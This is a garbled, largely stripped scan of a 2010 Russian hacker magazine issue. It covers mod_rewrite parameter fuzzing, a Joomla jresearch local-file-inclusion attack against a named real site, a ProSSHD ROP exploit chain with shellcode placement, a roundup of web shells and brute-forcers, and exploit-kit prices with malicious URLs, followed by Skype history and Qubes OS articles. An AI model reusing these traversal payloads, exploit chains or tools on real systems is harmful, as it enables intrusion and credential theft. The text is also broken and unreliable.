HTTP-, COOKIE
( )
.
mod_rewrite -.
:
1. URL. , http://www.example.com/main/
search/stroka_poiska, , URL
-;
,
. -.

/main/ -,
search=stroka_poiska

RewriteRule ^(.+)/(.+)$ script.php?act=$1&value=$2


script.php, main
act=search&value=stroka_poiska
RewriteRule ^(.+)/(.+)/(.+)$
$1.php?value1=$2&value2=$3


main.php, -
value1=search&value2=stroka_poiska
, mod_rewrite
, URL-
. , :
RewriteRule ^(.+)/(.+)$
php?value1=$2&value2=$3
RewriteRule ^(.+)/(.+)/(.+)$
php?value1=$2&value2=$3

script1.
script2.

-:

RewriteRule ^search/(.+)$ search.php?search=$1

http://www.example.com/stroka1/stroka2
http://www.example.com/stroka1/stroka2/stroka3

http://www.example.com/main/search/stroka_

2. , -

poiska search.php,

. http://www.example.com/main/articles/statya.html

( 3 )
X 07 /138/ 10

065

( )

PHP, ASP Perl,


HTML;

3. ,
mod_rewrite,
( );
4.
(, (/) %2F (hexadecimal
encoding) %252F (double encoding)),
URL- mod_rewrite.
mod_rewrite,
. ,
, Security Through Obscurity,
.

mod_rewrite
(brute-force),
, (rewrite rules) mod_rewrite.
:
( URL (
- Apache 2.x 8192 , IIS
16 384 );
() ;
(
) id, count, ..
( );
( );
(
).
-
mod_rewrite.
1. .
,
index.php, main.php. ,
(, 404 Not Found).
URL-,
-, http://www.example.com/index.php
(RewriteRule ^(.+)$ script.
php?$1). .

066

2. , .
-
, id, file .. ,
:
(id, path, page, debug, cat
.);
(1-5 ) [a-z0-9_] ;
:
"" + " ";
" " + "";
" " + " (_,-)" + "
";
" " + " (_,-)"
+ " ".
, ;
- (param[]).

, :
, PHP- ,
(http://example.com/index.php?param[]=value),
, (
error_reporting level), .
:
GLOBALS (http://example.com/index.php?GLOBALS[var]=
value);
_SERVER (
);
zend_hash_key (
unset()).
3. .

. , , 1,
,
, . .
( XSS, Local File Including, Path
Traversal, etc),
.
, , :
: 0,1,2,.. . X 07 /138/ 10

3 : 0, 1 >1.
,
.
: , ../, a%00 .. ,
,
.

. ,

. ,

:
.
:

.
.
:
(False
Positive ),
,
.
:
. ,
.
,
. ,
, ,

.
,
. ,
10-15 ,
.

URL http://example.com/main/search/stroka_
poiska, ,
stroka_poiska ,
, ,
,
URL-, . .

. (5-9 ),
.

(False Positive).
, URL http://example.com/main/search/test
test.
.
http://
example.com/main/search/test (, <b>test</b> )
, test.
,
.

4. .
http://example.com/script.
php?param1=value&param2=value&&abc=value. URL 8192
( Apache). ,
[a-z0-9] 4 5880 .
3-5 .

5. .
,
.
-

.
:
.
:
.
( )
.
:
,
(, ,
).
.
:
.
:
,

(,
).
- ( 1-2 5-7 ,
1,5-2 4 ).
X 07 /138/ 10

http://example.com/main/search/stroka_poiska,
stroka_poiska
. ,
, .


,
.
:
1. , (
params.txt), (
+ (_,-) +
). ,

(param[]).
2. .
3. (
, ).
4. (, http://example.com/index.php?page=admin)

HTTP://WWW
links

:
owasp.org/index.
php/Double_Encoding
dimoning.ru/kaknapisat-svoy-dvizhokbloga-1.html
webscript.ru/stories/07/02/01/
2099269]
ru.wikipedia.org/wiki/
_
raz0r.name/mysli/
proveryajte-tip-dannyx/hardened-php.
net/globals-problem
hardened-php.net/
advisory_192005.78.
html
wisec.it/vulns.
php?id=10
hardened-php.net/
hphp/zend_hash_del_
key_or_index_vulnerability.html

DVD
dvd
Yummy...


,

:

;


;


;

( ,
, ).

5. , .
..:
MaxPatrol Positive Technologies.

...

-,
mod_rewrite, ,
register_
globals, , (debug)
.. ! z

WARNING
warning


!
,

067


rsimplex.light@gmail.com; http://www.youideas.ru

ProcFS
Web-
PROCFS

, Web- ,
: SQL-, lfi, rfi ..
! , ,
,
, .
.
: Gmail,

Joomla jresearch. ,
local file including (lfi). require_once(),
,
. , ,
. URL jresearch,
, - rediscoverscience.com.
.
, , :
http://rediscoverscience.com/component/jresear
ch/?task=show&view=publication&id=18&controlle
r=../../../../../../../../../../etc/passwd%00

. shadow.
, :).

068


.
, CMS Joomla,
, ,
configuration.php (
, FTP ).
. ,
: PHP (
PHP-).
PHP- ,
.

- . :
PHP-,
, . ,
, ,
,
proc: /proc/self/environ,
/etc/passwd.
X 07 /138/ 10


,
. ,
, :
http://rediscoverscience.com/component/jres
earch/?task=show&view=publication&id=18&con
troller=../../../../../../../../../../../../
proc/self/environ%00

PROCFS

ProcFS ( process file system)


,
Unix-like

.
/proc. /proc
, ,
. ProcFS
Linux, Solaris, BSD, QNX .
ProcFS:
/proc/PID/cmdline
( PID self);
/proc/PID/environ
;
/proc/PID/status ;
/proc/PID/fd ,

;
/proc/cpuinfo
(, , ..);
/proc/cmdline ,
;
/proc/uptime ,

;
/proc/version
, ,
.

X 07 /138/ 10

cpanel

PHP,
:
DOCUMENT_ROOT ;
SERVER_ADDR IP- ;
SCRIPT_FILENAME index.php;
HTTP_USER_AGENT ,
;
HTTP_COOKIE ..

, , , . ,
, , -
PHP-, !
, PHP . c "ja_purity_tpl",
CMS,
<? phpinfo(); ?>. /proc/self/
environ .
, , -
.
"__utma" <? phpinfo(); ?> :
.
, ,
user-agent. ,
<? phpinfo(); ?> PHP, PHP.
configuration.php, , ,
user-agent ,
:
<? readfile("/home/redisco3/public_html/
configuration.php"); ?>

/proc/self/environ.
,
configuration.php.

WARNING

warning
!

.
,

HTTP://WWW
links
securitylab.ru/
vulnerability/392546.
php

packetstormsecurity.org/1003-exploits/
joomlajresearch-lfi.
txt PoC-

jresearch
xakep.ru/
post/49508/default.
asp ][

:

local
remote file include
xakep.ru/magazine/xa/111/146/1.
asp ][

069

HTTP-

Include cookie

phpinfo()

PROCFS

.
CMS , , .
. ,
proc, : /proc/cpuinfo
, xeon'e, /proc/version
:
Linux version 2.6.31.9-grsec (root@web55.justhost.
com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46))
#1 SMP Thu Feb 25 02:14:17 CST 2010

, ,
cpanel. ,
FTP.
, .

, :
-

070

()
. , ,
, .
:).z
X 07 /138/ 10

, Digital Security a.sintsov@dsec.ru

ROP
ROP
ROP
ROP
ROP
VIRTUAL PROTECT
Param1
Param2
Param3
Param4
JUMP ESP
NOP
NOP
SHELLCODE

0x06060101
pop ecx
retn
0x06060201

1.
2.
3.

pop eax
retn

0x06060101
0xBAADF00D
0x06060201
0x01020304

0x06060301

0x06060301

mov [eax], ecx


retn

ROP:

ROP,
-
, , ROP.
(
, ..) permanentDEP ASLR.
?

, ! DEP ASLR.
,
, Microsoft. ret2libc
DEP , permanent DEP + ASLR
JIT-SPRAY ( JIT-, , Flash). , ,
,
,
. JIT SPRAY X 07 /138/ 10

, , ,
, ROP,
. , ,
Flash JIT-SPRAY.
, , ; , , , malware
Acrobat Reader (CVE-2010-0188)
. , pwn2own
iPhone PHP 6.0 DEV.
,
.

071

0x06060101 // AAAA

0xBAADF00D // BBBB
0x06060201 // CCCC

0x01020304 // DDDD
eax
0x06060301 // EEEE

: 0x61616161!

--...

HTTP://WWW
links
cseweb.ucsd.
edu/~hovav/dist/
geometry.pdf

ROP
(2007 ).
blip.tv/file/3564232

Source Boston 2010.




ROP.
dsecrg.com

ret2libc.
,
.
( , , ),
hardware-permanentsuper-puper-DEP. hardwareDEP ret2libc . ,

. ,
. : . , , , ,
, .. ,
API-, , ,
, ,
. - , ,
.
, . ,
- (, 0xBAADF00D)
(, 0x01020304)?
(
),
.
:
pop ecx ;
pop eax ;
mov [eax], ecx ;

,
, ,
,
.
0x06060101:
0x06060102:
. . .
0x06060201:
0x06060202:
. . .

pop ecx
retn
pop eax
retn

0x06060301: mov [eax], ecx


0x06060304: retn

072


ecx
retn
retn

,
:
[BUFFER][RET]

ROP :
[BUFFER][AAAA][BBBB][CCCC][DDDD][EEEE]

, , ,
. -,
, -,
( ,
SEH-, ROP
). , ROP-
. C
. ,
.
? ,
VirtualProtect (
) , , WriteProcessMemory (
). ASLR
, ,
? - , .
, ASLR ,
,
, DLL (
FireFox,
Windows 7 ASLR+DEP pwn2own 2010). ,
,
ASLR ,
.
(Alex Sotirov)
BlackHat 08.
DLL.
.

ROP REST ON PAIN

ROP-. . ActiveX
ProSSHD
1.2. SSH- Windows.

SCP-. S2 Crew,
. :
491 , 4
. ,
, ,
495 . :
[491 'a' 0x41][RET=EIP]
X 07 /138/ 10


ASLR

[AAAAAAAAAAAAAAAAAAAAAAAA]
^
ESP

, [RET] [AAAAAAA]
ROP-. , , .
, . , (/GS)
SEH,
, , , ESP . (SEH- )
, ESP (
) ,
RETN ROP. ,
- :
add esp, 0xXX
retn

- :
mov esp, ecx
retn
;
xchg ecx, esp
retn

, . Immunity Debugger
orelan0d3r.
, ,
, ROP ,
. ,
, ASLR, Windows 7.
, ProSSHD
: MFC71.DLL MSVCR71.DLL.
ROP;
DEP + ASLR. DEP?
,
VirtualProtect() 0x7C3528DD (MSVCR71.DLL).
; - ASLR ,
MSVCR71.DLL . ,
,
. , ,
, VirtualProtect.
VirtualProtect :
VirtualProtect(
IN
LPVOID lpAddress,
//
IN
SIZE_T dwSize,
// 0x1
IN
DWORD flNewProtect,
// 0x40
IN
PDWORD lpflOldProtect // ,
X 07 /138/ 10

( )
);


DEP, . - ROP.
: VirtualProtect MSVCR71.
DLL, , ,
RETN, EBP.
( ),
, EBP-0x58 LEAVE
.
7C3528DD
CALL
DWORD PTR DS:[<&KERNEL32.VirtualProct>
7C3528E3
LEA ESP,DWORD PTR SS:[EBP-58]
7C3528E6
POP EDI
7C3528E7
POP ESI
7C3528E8
POP EBX
7C3528E9
LEAVE
7C3528EA
RETN

, :
0x00:0x7C3528DD
0x04:ADDRESS_1
0x08:0x00000XXX
0x0C:0x00000040
0x10:ADDRESS_2

------

VirtualProtect


READ_WRITE_EXECUTE
, ESP

. 4 .
VirtualProtect MSVCR71.DLL.
, ,
. ,
, ,
.
, ,
. ,
, VirtualProtect . .
.
, . , ,
, - .
.
0x0012XXXX.
. -
ROP. . JIT SPRAY , DEP
. ROP-
100% . :
0x000:ADDR_1
0x004:ADDR_2
. . .
0xX00:ADDR_X
0xX04:0x7C3528DD
0xX08:ADDRESS_1

-- ROP-

-- VirtualProtect

073


0xX0C:0x00000XXX
0xX10:0x00000040
0xX14:ADDRESS_2
0xX18:RET_ESP
0xX1C:0x90909090
0xX20:SHELLCODE

-- 0xX0C
-- NOPs

ROP-
VirtualProtect 0xX08, 0xX0C, 0xX10, 0xX14. ,
. ProSSHD.
, EDI EBP
ESP.
, EDI EBP ,
. EDI ESP, ,
1049 . ROP-, ,
ROP- VirtualProtect,
RETN.
NOP ROP.

ITS ALIVE!

. , RETN.
. ,
.
, , ,
. ?
, , orelan0d3r
ROP- ()
, . (Peter Van Eeckhoutte
corelanc0d3r) -
, . ,
RETN

. ,
ROP- . ,
-
EAX, . EAX .
,
EDI (, ) EAX EDX.
,
EAX, EDX. .
, .
(
).

VirtualProtect,
0x40, EAX, , ,
ECX. EAX . ,
EAX
ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".

# MOV ECX, EAX / MOV EAX, ESI /


# ESI

, ECX, EAX -
0x40. , EAX -0x40, NEG EAX.
. , -0x40=0xFFFFFFC0,
, ,
POP EAX. 16 ,
RETN 0x10.
"\xC1\x4C\x34\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\xC0\xFF\xFF\xFF".
"\x05\x1e\x35\x7C".

#
#
#
#
#
#
#
#
#

/ RETN

-0x40: EAX
NEG EAX / RETN

. EAX 0x00000040.
ECX ,
VirtualProtect,
.
"\xc8\x03\x35\x7C".

# MOV DS:[ECX], EAX / RETN

ECX EAX.
"\x40\xa0\x35\x7C".

# MOV EAX, ECX / RETN


VirtualProtect (-0x40).
, .
EAX 12 ( ),
( 4 )
.
"\xA1\x1D\x34\x7C"x12.

,
. .

POP EAX

# DEC EAX

/ RETN

EAX EAX+4.
.

$fuzz = "\x41"x491 .
"\x08\x94\x16\x7C".


ROP-. ( EDI) EAX.

# MOV DS:[EAX+0x4], EAX / RETN

EAX 4 .
"\xB9\x1F\x34\x7C"x4.

"\x9F\x07\x37\x7C".
ESI / RETN

8 (
EDI ESI), 8 ,
.
"\x11\x11\x11\x11".
"\x22\x22\x22\x22".

074

# INC EAX / RETN

# MOV EAX, EDI / POP EDI / POP

# EDI
# ESI

EAX ,
EAX+4 ,
. ,
, . -, 1
.
.
"\xB2\x01\x15\x7C".

# MOV [EAX+0x4], 1
X 07 /138/ 10



ASCII-.

,
VirtualProtect. -
. ESP .
EAX 16 .
"\xA1\x1D\x34\x7C"x16.

# DEC EAX

ROP

/ RETN

ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".
"\x40\xa0\x35\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".

# MOV ECX, EAX / MOV EAX, ESI /


#
#
#
#
#
#
#

ESI
MOV EAX, ECX / RETN

ECX. EAX ,
EAX+20 , , (
0x40).
"\xB9\x1F\x34\x7C"x4.

# INC EAX / RETN

.
"\xE5\x6B\x36\x7C".

# MOV DS:[EAX+0x14], ECX

412 .
4 VirtualProtect
408
.

,
, . ,
JIT SPRAY, ,
. ,
0x7c345c2e ANDPS XMM0, XMM3.
2 ,
PUSH ESP / RETN.
, RETN , EIP.
"\x30\x5C\x34\x7C".

# PUSH ESP / RETN

, .
NOP.

"\xBA\x1F\x34\x7C"x204 . # RETN
"\x90"x14 .

# NOP

, VirtualProtect.
"\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP,
[EBP-58] / POP EDI / ESI / EBX / RETN

, ( bind shell 4444


).
$shell;

, . ROP-.
"AAAABBBBCCCCDDDD".

12
. :).
"\x1A\xF2\x35\x7C".
"XXXYYYZZZ123".

X 07 /138/ 10

# ADD ESP, 0xC / RETN


# , -

. ,
, .
, .
, : 0day
, 300%
0day iDefense ZDI. , , ,
. , , $$$. ! :) z

075


icq 884888

X-TOOLS

: ArxFuckingHash3
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7

Bind port/Backconnect ( );
;
.

- Perl

: ARXWOLF


webxakep.net
-.
, -
(md5, MySQL, Sha1)
. ?
-
,
? !
ArxFuckingHash3, !

.
:
(10 10 );
md5, MySQL, Sha1 ;
-
( servers.ini);

;
;
;
;
;
( ./help).

-
,
webxakep.net/forum/showthread.php?t=4753.

: PPS 1.0 PERL


WEB-SHELL
: *NIX/WIN
: PASHKELA

-,
PHP.

076


.
- PPS 1.0 , .

PHP-:
(
"root");
;
;
, , , ,
;
;
chmod, touch, zip, unzip

;
;
MySQL-;
backconnect;
Perl- -;
;
POST-.


forum.antichat.ru/
thread198119.html.

: CGI WEB SHELL


: *NIX
: ORB

-,
, PHP,
CGI web shell ,
- :

- Python

http://forum.
antichat.ru/showthread.php?t=147269.

: PROXY SCANNER
: *NIX/WIN
: SHARKY

, ,
- -.

Proxy Scanner Sharky.

IP-, .
,
,

.
Proxy Scanner'
:
1. proxyscanner.pl;
2. :
Start IP ( IP , ,
192.168.1.1);
End IP ( IP , ,
192.168.255.255);

;
, , , touch-, chmod-;

;
;
Python'e
-;
X 07 /138/ 10

Port ( , , 3128);
Timeout ( , , 10);
Threads (, , 50);
File for good proxies (
, , proxies.txt).
,
, enjoy!

: LAMESCAN2 ANTIRADMIN
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: REDSH

ins ;
f9
;
shift+f9 ;
f5 ;
f7 HTML;
f2 ;
f3 ;
ctrl+ins,

.

: http://redsh.
tk
.

: RSAEMAILCHECKER 2.0
:WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: RSARELIABLES

LameScan2 .
:
;
;

-,
, up, down error
(
,
, -
);


;
.csv
;

CSV HTML;
SDK;

IP-.


antiradmin LameScan2. ,
radmin 2.0, 2.1 2.2 .
:
;
;

;
( ,
, ).


:
X 07 /138/ 10

e-mail
rsaEMailChecker
e-mail
. :

;
;
;
;

e-mail ;
(
);
POP3;
;
( );
;
;
(user@
server.domen;password user@server.
domen:password);
.Net Framework 2.0 .

:
,
;
... ,
;

"connected == false" ,

;
"invite == false" ,

(, POP3- /
);
"user == -err" ,

POP3-;
"bad" ,
;
"good" ,
.

,
webxakep.net,
http://webxakep.net/
forum/showthread.php?t=6348.

: JBBL JABBER BRUTE


BY LYTGEYGEN V.0.1
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: LYTGEYGEN

? :). ,
jbbl Jabber-.
:
Visual Basic
xmpp;
( 100 );

;

Jabber-
;
good.
txt;
;
Jabber-
.


: forum.asechka.ru/showthread.
php?t=119636.z

077

MALWARE
VIRUSES
vaber@inbox.ru

: AVG, AVIRA AVAST?


] [ , ,
. , -
: autorun-,
. : AVG, AVIRA
AVAST. ,
.

,
. , , . IE6
IE7, Adobe (Flash Player, PDF Reader),
RealPlayer JAVA. IE,
][.
, , ,
.
iframe,
, .
,

, .
:
Eleonore Exploits pack
Phoenix exploit kit
NeoSploit
YES exploit kit
Siberia Exploits kit

078

Seo Sploit pack


Crimepack Exploit System

, , , . , -,
. , ,
.
, ,
.
MDAC (MS06-014),
2006 . IE6
.
, , malware. ,
IE6/7
Adobe Acrobat Reader,
Oracle Corporation JAVA.
IE,
.
Acrobat Reader:
Adobe Acrobat Reader
Adobe Collab.collectEmailInfo CVE-2007-5659
X 07 /138/ 10

>> coding


,
.
5 20%, 10%.

, , .
Phoenix exploit pack
: MDAC, MS Office Snapshot, JRE, Flash10,
CVE-2010-0806, Adobe Acrobat Reader
( 2.0): $400

Crimepack Exploit System


: MDAC, DSHOW, MS09-002, Flash10, Adobe
Acrobat Reader, JRE
( 2.8.1): $400
Eleonore Exploits pack
: MDAC, JDT, PDF collab.getIcon, PDF collab.
collectEmailInfo, PDF NewPlayer, Java GSB 1.5/1.6
( 1.4.1): $1500

IP. /
IP
$50.

: $50-80
.

Adobe
Adobe
Adobe
Adobe

Util.printf CVE-2008-2992
GetIcon CVE-2009-0927
Media.newPlayer CVE-2009-4324
Pdf libtiff CVE-2010-0188

JAVA:
JAVA
Deserialize CVE-2008-5353
GetSoundBank CVE-2009-3867

?
.
,
( ,
? :)), , .
,

( iframe),
- .

, . ,
:
X 07 /138/ 10

KAV
1. ,
;
2.
,
;
3.
;
4. ;
5. ( , )
;
6.
.

.
,
, ,
. ,
.
,

Drive-by, , .
AVAST! Internet Security, Kaspersky Internet Security,
ZoneAlarm Extreme Security, HIPS DefenseWall .
,
free-.
: AVIRA, AVG AVAST!. ,

, ,
Kaspersky anti-virus.
, ,
:

DVD
dvd

Drive-by

.

,
,

OllyDbg

TDL3 (TDSS, TidServ,
Alureon).

AVASt!

079

MALWARE

Phoenix exploit pack


on-demand

-
,

AVG

on-demand

-

phpnuke.org
on-demand

-
,



, . :
1. Vmware Windows XP SP3 32-bit
Internet Explorer 7.0.5730.13 (
, ).
Adobe Reader 8.1.1 JAVA jre 1.5.0.10. ,

AVIRA

on-demand
KAV

url url

exploits pack

kjtkmr6.com/kjt/index.php

Eleonore Exploits pack

ykttd.com/ykt1/index.php?s=738098
d66710721283d32479eed007d7
ndpwrgg.info/images/k.html
bteldd.info/cgi-bin/class.phtml
portalmeslive.com
ajitkkravmr.com/ld/prox/
repmycitys.com/i1/index.php

Eleonore Exploits pack

xgazz.biz/var/index.php

Phoenix exploit kit

tossedcabin.net/start.php

YES Exploit kit

fxeurostar.org
ofruv.com/bet/index.php
bmw-pad.com/p/i.php?user=admin

directs to Phoenix
Phoenix exploit kit
Siberia Exploit Pack

d.poafirst.com/index.php

Seo Sploit pack

maycoffe.com/x00x/index.php

Phoenix exploit kit

080

directs to NeoSploit
NeoSploit
directs to NeoSploit
NeoSploit
Phoenix exploit kit

md5
c57f8af1fd65ab10849d
86ce9aef155a
fa69e6065061a3b67032
32da2bdaea5a
2A9728B5CF7FC2067C
08DC83D3527F49
4AC42220FCDB3FC6E
74E1DB751258F68
9275294ddfe421cd065a
9f2b374f6979
c6fe1134e68465a9baaf
2e4eaddc3807
5633FF368E1D45DC4D
2021FB84FD71B5
a4a90c515c6ac4cbbfdf
511644bec3c7
e391bac860e8b97f548c
5848ed6801da
7A77A4BBE8FCF7A02
F7C2FF33B54321A
e048facbaeef0fe3eab6
0e44af9c40f2

AVIRA
10.0.0.567

AVAST
AVG AVP 9.0.0.736
5.0.507 9.0.814
(a,b)

X 07 /138/ 10

>> coding

AVIRA :)
, Adobe Reader
JAVA.
2. ,
. , .
:). ,
.
3. snapshot, , .
4. , malwaredomainlist.com
URL, exploit pack.
, , payload
( ,
, ) ,
, .
exploit pack .
5. snapshot , .
, .
,
, .
malware -, ,
, :). . / .
.
,
, .
X 07 /138/ 10

, Kaspersky AVAST! Drive-by. ,


:). ? , ,
? ! .

malware, , :
1. ;
2. Windows ,
;
3.
, .
Adobe (Acrobat
Reader, Flash Player), JAVA, WinZip, Firefox, Opera,
Foxit, RealPlayer;
4. Sandbox
( ) . , ;
5. , ,
, ,
, ;
6. . z

081

MALWARE
VIRUSES



,

Dr. Web
.
?
- .
, , -
, , .

?
- 1997
IBM PC.
, , !
,
DOS, Win3.1,
Win9x. , .
?
,
.
Far Manager ( , , ),
Hiew hex-
. , .
IDA Pro + Hexrays ,
reverse engineering.
OllyDdbg WinNT.
, .
. , ,

,
, .

, ?
,
. ,
, , Dr.Web.

,
. , , Dr.Web Virus Chaser.
-,
(virustotal.com/jotti.org/virscan.org ..),
-

082

. , honeypots
, . .
.
:
,
, ,
, .
, . . , ( )
.
,
, .
. , , .
, , .
, .
, , .
, .

. .

?
Linux.Hasher.
, Linux-, ELF-.
.
, , .
.hash,
ELF
. Linux.Hasher
,
.
219 . z
X 07 /138/ 10

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,


Mifrill mifrill@real.xakep.ru

,
?
. , ? ! VoIP , ,
Skype. - .
SKYPE,

XIX-XX ,
,
, . ,
(, )
,
- .

, . : 15
,
,

074
084


- ( ,
,
, ,
, ).
,

, .
, 1964 AT&T
-,
. ,
Picturephone Mod I
-
. , ,
. ,
, 3
: (
1 )

. 2 .
.
-
$16 3 , $27,

. , 1968 .
, .
-, ,

.
,

. ,
X 07 /138/ 10

SKYPE ()
.

60- ,
80-,

SKYPE 4.0

X 07 /138/ 10

ISDN (Integrated Services


Digital Network) ,
, ,
. ,


Voice over IP (VoIP) 90- .
,
Internet
Phone, VocalTec. Internet Phone
1995 , ,
IM+,
. , ,
omigod, its
magic!!11. , ,
, (
VocalTec
,
).
, , ,

Internet Phone
. -
,

085

IP-,
VocalTec Telephon
Gateway (VTG).
1997
,
,
.
1999 SIP (Session
Initiation Protocols),
1996 IETF,
. H.323
, ,
,
.

, Skype.

CU-SEEME

SKYPE

1967 ,

, - .
, 1995
DigiPhone, .

.
90-
CU-SeeMe, Mac,
Windows. ,
CU-SeeMe 1994 Endeavor NASA
.
VoIP,
IP-, ,
1996 . International
Telecommunication Union
,

086

,
,
.323,
50 .
,
- ,
.
,
, Internet Engineering Task Force (IETF),

,
Realtime Transport Protocol (RTP),
.323.
VoIP
:
1996
VocalTec
Dialogic.
-

Skype
,
(Ahti Heinla), (Priit
Kasesalu) (Jaan Tallinn).
, , - ,
Skype
(Janus Friis)
(Niklas Zennstrom).
, .
,
, ,
. , .
, 2000-

P2P- KaZaA,
.
Skype, IT-

, ,
.
?
. ,



( KaZaA, Skype),
. , Skype ,
, .
,
Skype ,
.
Skype
2002
Draper Investment Company,
:
Skype.com Skype.net
,
-
2003 . ,

X 07 /138/ 10

SKYPE IPHONE

Skyper (
Sky peer-to-peer),

Skype, Skyper
.
, Skype
,
,
? , IP-, Skype

P2P-,
,
. ,
:
,

PICTUREPHONE II AT&T

X 07 /138/ 10

VOIP .
(
, ). Skype

, , NAT

(
).
Skype IP-
,
SIP,
.

Skype, SIP ,
.
SIP HTTP-
SIP, HTTP,
,
.
,
SIP, , ,
.
Skype, SIP ;
,
,
.
,
,

(, ,

). SIP

-.
Skype SIP, , Skype-
SIP.
, : Skype ,
P2P- (
AES-256,
, ,
1024- RSA.
Skype
1536- 2048-
RSA), SIP
.
,
Skype
UDP,
TCP-, , Skype
HTTP-.
,
Skype
, Skype, , . .

, -

087

SKYPE
SKYPE
, ! , ,
, ,
,
Skype .
Skype , . 2007
][ ,
Skype: .
: Skype

, ,

.
, .
Skype , ,

Skype-.
Skype , :
.
,
2003 , Skype 10
, IM,
.
,
,
. , Skype
SVOPC (16 ), AMR-WB (16 ),
G.729 (8 ) G.711 (
ILBC ISAC), (30-60 /)
,
.
2003 ,
Skype .

. , , ,
SMS

088

,
Skype
:).
,
, 2005 ,
(74,7 .
10,8 . ),
eBay .
, Skype
,
:
Skype
560 . ;
Skype
,
;
VoIP;
Skype - Skype- ,
,
Skype.

,
Skype,

, , .
,
.
,


. , ,
, .

,

Tele2, 1996
.
,
, 2000 ,
KaZaA.
,
,
,
.


,
.
Napster, ,
, ,
KaZaA.
-, ,

.

,
,
.
,
,
, KaZaA .
,
KaZaA
Sharman Networks,
. -
, -
, KaZaA.

, Joltid,

.
,
.
X 07 /138/ 10

1878
,
Skype.
,
Skype,

(
, KaZaA)

. ,
,
Skype CEO
2007 ,
eBay.
, eBay. ,
2005 ,
Skype eBay
2,6
1,5
,
Skype (
eBay ). , ,
, , ,
,

. - .

Joost, ,
Skype
. , , :
53
400 , Skype 2008
33 ,
eBay .
Skype
, , 2009

, ,
X 07 /138/ 10

Skype
.
.
,
eBay Skype (

:
),
2009
. , Skype, eBay

. -,
Joltid. ,
Skype ,
,
. ,
New York Times, , ,
Skype

,
.
,
eBay
Joltid , ,

. .

.
eBay,
, 65%
Skype Andreessen
Horowitz 2 . .
,
Skype,

$75 .
. ,


( , eBay 35%
!),
Joltid ,
Skype. , ,
, , eBay
Skype ,
.

, 2009 .
,
. eBay, - - Skype,
.
,
, 14%
Skype.
,
eBay
.
, , ,
,
. , Skype ,
, . ,
Joltid
, eBay
Skype .
,

, ,
,
Joltid
.

: Skype
?, , ,
. -,
-
(
Skype
, ).
,
Skype, VoIP-

,
. , Skype :
VoIP,
,
, .
-
,
, Skype , ,
,
. z

089

UNIXOID
zobni n@gmail.com

Qubes OS


Qubes OS
Linux

- .

, ,
, .
,
. Qubes OS
, .

?
, Qubes
OS, ,
-

090

,
.
:

;

;
(
).

X 07 /138/ 10

Qubes OS

?
. -,

Blue Pill (http://bluepillproject.org),
,
, .
eWeek (http://eweek.org) ,
2006 (Five Hackers who Put a Mark on 2006).
2009 Rafal Wojtczuk
Intel TXT Intel
System Management Mode (SMM). Invisible Things Labs (http://invisiblethingslab.com),
.

( ) ,
,
.
( ).
,
,
(
), , .

.
,
(Flawfinder,
X 07 /138/ 10

RATS, Skavenger, lint ..). , OpenBSD


,
, . Coverity
(Coverity Prevent) , .

( )
, .
, Microsoft
BSD-.
.
, , , .

.
, .
,
.
, ,
(
root).
,
.
,
,
,
, nobody
SELinux BSD Jail.
(-, ),
(
,
: ,
..).


, ,
, . ,
.
,

091

UNIXOID

,

. ,
(
, , )
. ,
( ),
.

, ,
.
,
. -, ,
-,
.
.
? .

: QUBES OS
Qubes OS (http://qubes-os.org) Linux ( ),
(Joanna Rutkowska),
. Qubes OS
,

.
Xen (www.xen.org),
, Linux, , ( )
. Qubes OS .
( )
, .
( , TCP/IP, DHCP- ..)
, .
Intel VT-d.
(Dom0 Xen)
, X Window,

( ).
Xen Qubes OS ,

092

.
, ,
( , )
Linux. ,
,
Intel VT-d, , ,
, .


Qubes OS
, .
Linux
.
, Qubes OS :
Qubes OS ( Xen HVM), ,
, , , .
Qubes OS , , ,
,
. ,
Entertainment : , YouTube.
Shopping -.
Banking - . , ,
- Entertainment,
, Shopping
Banking, . ,
(
Qubes OS, ).

. ,
,
Linux.
copy-on-write (
Device Mapper).
COW-
.

( /home, /usr/local, /var). COW-
LUKS (The Linux Unified
Key Setup),
X 07 /138/ 10

.
.
,
.


(Xen Dom0)
Qubes OS. , .

: ,
,
( , TCP/IP, DHCP-, ,
..), :
.
:
XenStore, ,
GUI-, X Window
KDE ( ,
, GUI,
).

Qubes OS.
3D-,
,
() . ,
, Qubes OS
,
. ,
.
(,
,
, ).
GUI X- (
), . ( ),
XGetImage X Window , Xen Ring buffer protocol, .
, AppViewer,
,
XRenderComposite.
Qubes OS ,
, .
X 07 /138/ 10

Qubes OS



.
TCP/IP, , ,
WiFi- ,
.

, .
Qubes OS (Network
Domain) , . ,
,
Linux-, ,
, .
, ,
: ,

. , ,
, , ,
Entertainment, .

(
Qubes OS).
, Xen
.
eth0.
vifX.Y, X , Y . Xen vifX,Y
(, wlan0)
bridge,
, . Qubes OS,
, .

,
,
.


, ,
, .
, ATA SCSI, USB-,

093

UNIXOID

Qubes OS
.
. Qubes OS
,
(Storage Domain).


.
Linux,
, ( ). ,
, :
.
.

, . , .
, Intel TXT. , , ,
.
, , , . , , Xen
.


Qubes OS :
1. ,

( ).
Intel TXT (Trusted Execution
Technology). ,
TPM (Trusted Platform Module).

094

2. , initramfs. , , ,
, TPM
.
3. initramfs ,
.
,
.
,
, keys.gpg, , .
4. keys.gpg initramfs .
5. Qubes OS , , keys.gpg.
6. ,
. initramfs
, , X Window, .
7. .
.

Qubes OS.

Qubes OS ,
- . ,
, ,
, ,
, Singularity (http://research.microsoft.
